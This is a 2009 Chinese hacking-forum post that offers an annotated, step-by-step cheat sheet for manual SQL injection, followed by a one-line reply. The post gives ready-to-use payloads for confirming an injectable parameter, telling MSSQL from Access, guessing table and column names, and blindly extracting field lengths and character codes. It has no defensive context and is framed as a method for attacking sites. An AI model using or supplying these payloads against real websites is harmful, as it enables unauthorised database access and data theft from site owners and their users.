找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 673|回复: 1

手工注入方法..(带注释)

[复制链接]

21

主题

37

回帖

77

牛毛

初生牛犊

积分
77
发表于 2009-4-18 09:58:32 | 显示全部楼层 |阅读模式 来自 辽宁省辽阳市
手动注入脚本命令[带注释] 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ’’=’ 4.搜索时没过滤参数的’and [查询条件] and ’%25’=’ 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 6.猜数据库 ;and (select Count(*) from [数据库名])>0 7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9.(1)猜字段的ascii值(access) ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (2)猜字段的ascii值(mssql) ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

23

主题

117

回帖

185

牛毛

一级牛人

积分
185
QQ
发表于 2009-4-23 15:15:45 | 显示全部楼层 来自 山东省烟台市栖霞市
看看!~~~~~~~~~~·
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-29 03:43 , Processed in 0.160015 second(s), 34 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表